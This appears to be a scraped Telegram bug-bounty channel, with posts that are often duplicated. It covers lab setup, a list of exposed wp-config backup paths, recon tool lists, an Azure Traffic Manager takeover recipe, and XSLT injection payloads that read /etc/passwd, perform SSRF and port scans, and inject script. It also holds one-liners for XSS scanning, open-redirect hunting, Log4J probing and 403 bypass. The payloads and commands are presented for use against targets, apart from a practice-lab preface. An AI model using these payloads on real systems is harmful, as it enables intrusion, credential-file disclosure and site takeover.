Brut Security
bugbounty-v1.1.zip
Bugbounty Practice Lab by TCM Security. Follow this guide to setup in Kali Linux! Step 1: Installing required packages
sudo apt update
sudo apt upgrade
sudo apt install docker.io
sudo apt install docker-compose
Restart your Kali VM.
Step 2: Unpack the labsCope the labs to a directory on your system (e.g. /home/kali/labs)
cd /home/kali/labs
unzip bugbounty-v1.0.zip
cd bugbounty
sudo docker-compose up
The first time you run this it will take some time because it needs to download the docker images to your machine. Next time you run it, it should only take 5-30 seconds.
Step 3: Setup permissionsIn a different terminal, navigate to where you unzipped the lab (e.g. /home/kali/labs/bugbounty) and run the set-permissions.sh script. This is used for labs that require write access, such as the file upload attacks.
./set-permissions.sh
Browse to https://localhost
The first time you load the lab the database will need to be initialized, just follow the instructions in the red box by clicking the link, then coming back to the homepage.
Enjoy your labs!
sudo apt update
sudo apt upgrade
sudo apt install docker.io
sudo apt install docker-compose
Restart your Kali VM.
Step 2: Unpack the labsCope the labs to a directory on your system (e.g. /home/kali/labs)
cd /home/kali/labs
unzip bugbounty-v1.0.zip
cd bugbounty
sudo docker-compose up
The first time you run this it will take some time because it needs to download the docker images to your machine. Next time you run it, it should only take 5-30 seconds.
Step 3: Setup permissionsIn a different terminal, navigate to where you unzipped the lab (e.g. /home/kali/labs/bugbounty) and run the set-permissions.sh script. This is used for labs that require write access, such as the file upload attacks.
./set-permissions.sh
Browse to https://localhost
The first time you load the lab the database will need to be initialized, just follow the instructions in the red box by clicking the link, then coming back to the homepage.
Enjoy your labs!
π₯9π4
Discussion Group Only π
https://t.iss.one/+bjrvAloQDJsxM2Fl
https://t.iss.one/+bjrvAloQDJsxM2Fl
Telegram
Brut Security | Discussion
Community Discussion
π4π₯1
Brut Security pinned Β«Discussion Group Only π https://t.iss.one/+bjrvAloQDJsxM2FlΒ»
π¨Here is a list of WP-exposed (wp-config sensitive) files!π¨
/wp-config.php-backup /wp-config.php.orig
/.wp-config.php.swp
/wp-config-sample.php /wp-config.inc /wp-config.old /wp-config.txt
/wp-config.php.txt
/wp-config.php.bak
/wp-config.php.old
/wp-config.php.dist
/wp-config.php.inc
/wp-config.php.swp
/wp-config.php.html
/wp-config-backup.txt
/wp-config.php.save
/wp-config.php~
/wp-config.php.original
/_wpeprivate/config.json
/wp-config.php-backup /wp-config.php.orig
/.wp-config.php.swp
/wp-config-sample.php /wp-config.inc /wp-config.old /wp-config.txt
/wp-config.php.txt
/wp-config.php.bak
/wp-config.php.old
/wp-config.php.dist
/wp-config.php.inc
/wp-config.php.swp
/wp-config.php.html
/wp-config-backup.txt
/wp-config.php.save
/wp-config.php~
/wp-config.php.original
/_wpeprivate/config.json
π10β€3π₯3
πNipeJS is a powerful tool designed to detect JavaScript leaks through precise regex pattern scanning, streamlining the identification of potential data leaks within code.
π₯https://github.com/i5nipe/nipejs
π₯https://github.com/i5nipe/nipejs
π₯3π2
π¨Tools collectionπ¨
Subdomain enum tools we can use!
1. bbot
2. amass
3. crt.sh
4. source codes
5. knockpy
6. subfinder
7. aquatone
8. subdomainzer
9. altDNS
10. Security Trails api
Bruteforcing tools we can use !
1. Go-buster
2. dirsearch
3. ssb - ssh brute
4. Callow -custom tools for logins
5. Ncrack - network
Spidering tools we can use !
1. Spider in Burp
2. Paramspider
3. Scarpy
4. Go_spider
5. aspider
6. ParamPAMPAM
Dir Enum tools we can use !
1. Dirb
2. Gobuster
3. Dirsearch
Wordlists we can use !
1. seclists
2. Assetnote
Subdomain enum tools we can use!
1. bbot
2. amass
3. crt.sh
4. source codes
5. knockpy
6. subfinder
7. aquatone
8. subdomainzer
9. altDNS
10. Security Trails api
Bruteforcing tools we can use !
1. Go-buster
2. dirsearch
3. ssb - ssh brute
4. Callow -custom tools for logins
5. Ncrack - network
Spidering tools we can use !
1. Spider in Burp
2. Paramspider
3. Scarpy
4. Go_spider
5. aspider
6. ParamPAMPAM
Dir Enum tools we can use !
1. Dirb
2. Gobuster
3. Dirsearch
Wordlists we can use !
1. seclists
2. Assetnote
π14β€7π₯3
This media is not supported in your browser
VIEW IN TELEGRAM
How to find Broken Authentication in 30 seconds or less using Autorize
πSetup Your Autorize in Burp
1. Proxy traffic through Burp
2. Browse the application
3. Select requests -> Extensions -> Autorize -> Send to Autorize
4. Check the "Unauthenticated" tab and column
π8π₯2
πLoad Balancer Takeoverπ
Step 1: Identify .trafficmanager.net subdomains. π΅οΈββοΈ
Step 2: Use your Azure subscription to access the Traffic Manager profile. π
Step 3: Create a resource with the vulnerable *.trafficmanager.net cname. π οΈ
Step 4: Add an endpoint for redirection to your desired site. π
Step 1: Identify .trafficmanager.net subdomains. π΅οΈββοΈ
Step 2: Use your Azure subscription to access the Traffic Manager profile. π
Step 3: Create a resource with the vulnerable *.trafficmanager.net cname. π οΈ
Step 4: Add an endpoint for redirection to your desired site. π
π₯4β€2π1
πXSLT Server Side Injectionπ
(Extensible Stylesheet Language Transformations) - Part 1
The most used frameworks are: Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica).
β1.β β Read Local File: read.xsl
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:abc="https://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
β2.β β SSRF
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:abc="https://php.net/xsl" version="1.0">
<xsl:include href="https://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
OR
<esi:include src="https://10.10.10.10/data/news.xml" stylesheet="https://10.10.10.10//news_template.xsl">
</esi:include>
3. Javascript Injection
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform">
<xsl:template match="/">
<script>confirm("We're good");</script>
</xsl:template>
</xsl:stylesheet>
4. Port Scan
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:php="https://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="document('https://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>
(Extensible Stylesheet Language Transformations) - Part 1
The most used frameworks are: Libxslt (Gnome), Xalan (Apache) and Saxon (Saxonica).
β1.β β Read Local File: read.xsl
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:abc="https://php.net/xsl" version="1.0">
<xsl:template match="/">
<xsl:value-of select="unparsed-text('/etc/passwd', 'utf-8')"/>
</xsl:template>
</xsl:stylesheet>
β2.β β SSRF
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:abc="https://php.net/xsl" version="1.0">
<xsl:include href="https://127.0.0.1:8000/xslt"/>
<xsl:template match="/">
</xsl:template>
</xsl:stylesheet>
OR
<esi:include src="https://10.10.10.10/data/news.xml" stylesheet="https://10.10.10.10//news_template.xsl">
</esi:include>
3. Javascript Injection
<xsl:stylesheet xmlns:xsl="https://w3.org/1999/XSL/Transform">
<xsl:template match="/">
<script>confirm("We're good");</script>
</xsl:template>
</xsl:stylesheet>
4. Port Scan
<?xml version="1.0" encoding="utf-8"?>
<xsl:stylesheet version="1.0" xmlns:xsl="https://w3.org/1999/XSL/Transform" xmlns:php="https://php.net/xsl" >
<xsl:template match="/">
<xsl:value-of select="document('https://example.com:22')"/>
</xsl:template>
</xsl:stylesheet>
www.php.net
PHP: XSL - Manual
π₯7π2β€1
This media is not supported in your browser
VIEW IN TELEGRAM
πFind JS Endpoints With 1-Clickπ
1. Add a Blank Bookmark on your browser.
2. Add this Regex(https://0-a.nl/jsendpoints.txt) in URL Section.
3. Now open any site and click on your bookmark!
1. Add a Blank Bookmark on your browser.
2. Add this Regex(https://0-a.nl/jsendpoints.txt) in URL Section.
3. Now open any site and click on your bookmark!
π₯9π2
This media is not supported in your browser
VIEW IN TELEGRAM
Remote Code Execution via Local File Inclusion POC by Abhishek Morla
π6π₯4
XSS Checks Made Easy π
Example: Execute XSS checks on a list of URLs with a single command.
Uncover Hidden Parameters in Seconds π΅οΈββοΈ
Example: Extract hidden parameters from URLs effortlessly.
Reveal Secrets in JavaScript Files π΅οΈββοΈ
Example: Identify sensitive data in JavaScript files like a pro.
Crush Directories with Effortless Bruteforce π
Example: Discover hidden directories and files effortlessly.
Expose Log4J Vulnerabilities with Ease π
Example: Identify Log4J vulnerabilities on the fly.
Hunt Down Sneaky Open Redirectπ―
Example: Uncover open redirects like a seasoned hunter.
Capture Screenshots in a Snap π·
Example: Capture screenshots of live websites effortlessly.
Know Your WordPress Version π
Example: Discover the WordPress version of a target website instantly.
Unearth Subdomains Containing JavaScript π
Example: Find subdomains with JavaScript files in a snap.
Bypass 403 Login Pages with Finesse πͺ
Example: Bypass 403 login pages like a pro.
Example: Execute XSS checks on a list of URLs with a single command.
One-Liner: cat urls.txt | dalfox pipe --multicast -o xss.txt
Uncover Hidden Parameters in Seconds π΅οΈββοΈ
Example: Extract hidden parameters from URLs effortlessly.
ONE LINER:
cat alive.txt |rush curl -skl β{}β |grep βtype\=\βhidden\ββ |grep -Eo βname\=\β[^\β]+\ββ |cut -dβ\ββ -f2 | sort -uβ | anew params.txt
Reveal Secrets in JavaScript Files π΅οΈββοΈ
Example: Identify sensitive data in JavaScript files like a pro.
One-Liner:
cat alive.txt | rush 'hakrawler -plain -js -depth 2 -url {}' | rush 'python3 /root/Tools/SecretFinder/SecretFinder.py -i {} -o cli' | anew secretfinder
Crush Directories with Effortless Bruteforce π
Example: Discover hidden directories and files effortlessly.
One-Liner:
cat alive.txt | xargs -I@ sh -c 'ffuf -c -w /path/to/wordlist -D -e php,aspx,html,do,ashx -u @/FUZZ -ac -t 200' | tee -a dir-ffuf.txt
Expose Log4J Vulnerabilities with Ease π
Example: Identify Log4J vulnerabilities on the fly.
One-Liner:
cat alive.txt | xargs -I@ sh -c 'python3 /path/to/log4j-scan.py -u @"
Hunt Down Sneaky Open Redirectπ―
Example: Uncover open redirects like a seasoned hunter.
One-Liner:
gau https://vuln.target.com | gf redirect | qsreplace β$LHOSTβ | xargs -I % -P 25 sh -c βcurl -Is β%β 2>&1 | grep -q βLocation: $LHOSTβ && echo βVULN! %ββ
Capture Screenshots in a Snap π·
Example: Capture screenshots of live websites effortlessly.
One-Liner:
assetfinder -subs-only https://target.com | httpx -silent -timeout 50 | xargs -I@ sh -c 'gowitness single @'
Know Your WordPress Version π
Example: Discover the WordPress version of a target website instantly.
One-Liner:
curl -s 'https://target.com/readme.html' | grep 'Version'
Unearth Subdomains Containing JavaScript π
Example: Find subdomains with JavaScript files in a snap.
One-Liner:
echo "domain" | haktrails subdomains | httpx -silent | getJS --complete | anew JS
Bypass 403 Login Pages with Finesse πͺ
Example: Bypass 403 login pages like a pro.
One-Liner:
cat hosts.txt | httpx -path /login -p 80,443,8080,8443 -mc 401,403 -silent -t 300 | unfurl format %s://%d | httpx -path //login -mc 200 -t 300 -nc -silent
π6π₯3
This media is not supported in your browser
VIEW IN TELEGRAM
πFuzzing and Bypassing the AWS WAF to trigger XSSπ
πTool - https://lnkd.in/gk4-_4yw
πBlog - https://lnkd.in/g4W7eA7R
πTool - https://lnkd.in/gk4-_4yw
πBlog - https://lnkd.in/g4W7eA7R
β€4π₯2π1
Bug Bounty Checklist and Cheatsheets
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
Authenication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf
Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html
File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf
IDOR-https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
XSS-https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
SQLi-https://portswigger.net/web-security/sql-injection/cheat-sheet
XXE-https://link.medium.com/lprTDcXRYgb
SSRF-https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery
2FA-https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view
CORS-https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration
Business Logic Flaws-https://link.medium.com/MX5hzfESYgb
CSRF-https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery
Insecure deserialization-https://thehackerish.com/insecure-deserialization-explained-with-examples/
Web Cache Poisoning-https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning
HTTP request smuggling-https://portswigger.net/web-security/request-smuggling/finding
Command Injection-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
SAML-https://github.com/e11i0t4lders0n/SAML-SSO
Race Condition-https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html
S3 Bucket Misconfiguration-https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007
Server-Side Template Injection-https://portswigger.net/research/server-side-template-injection
WebSockets Vulnerabilities-https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages
WAPT-https://github.com/KathanP19/HowToHunt/blob/master/CheckList/Web_Checklist_by_Chintan_Gurjar.pdf
Authenication-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/Authentication.pdf
Oauth Misconfiguration-https://binarybrotherhood.io/oauth2_threat_model.html
File Upload-https://github.com/HolyBugx/HolyTips/blob/main/Checklist/File%20Upload.pdf
IDOR-https://notion.so/IDOR-Attack-vectors-exploitation-bypasses-and-chains-0b73eb18e9b640ce8c337af83f397a6b
XSS-https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
SQLi-https://portswigger.net/web-security/sql-injection/cheat-sheet
XXE-https://link.medium.com/lprTDcXRYgb
SSRF-https://0xn3va.gitbook.io/cheat-sheets/web-application/server-side-request-forgery
2FA-https://drive.google.com/file/d/11FlzxlVw4GIZ60s5v3I1S5p8kXZHExFT/view
CORS-https://0xn3va.gitbook.io/cheat-sheets/web-application/cors-misconfiguration
Business Logic Flaws-https://link.medium.com/MX5hzfESYgb
CSRF-https://book.hacktricks.xyz/pentesting-web/csrf-cross-site-request-forgery
Insecure deserialization-https://thehackerish.com/insecure-deserialization-explained-with-examples/
Web Cache Poisoning-https://0xn3va.gitbook.io/cheat-sheets/web-application/web-cache-poisoning
HTTP request smuggling-https://portswigger.net/web-security/request-smuggling/finding
Command Injection-https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection
SAML-https://github.com/e11i0t4lders0n/SAML-SSO
Race Condition-https://pandaonair.com/2020/06/11/race-conditions-exploring-the-possibilities.html
S3 Bucket Misconfiguration-https://medium.com/@janijay007/s3-bucket-misconfiguration-from-basics-to-pawn-6893776d1007
Server-Side Template Injection-https://portswigger.net/research/server-side-template-injection
WebSockets Vulnerabilities-https://portswigger.net/web-security/websockets#intercepting-and-modifying-websocket-messages
π10π₯4β€3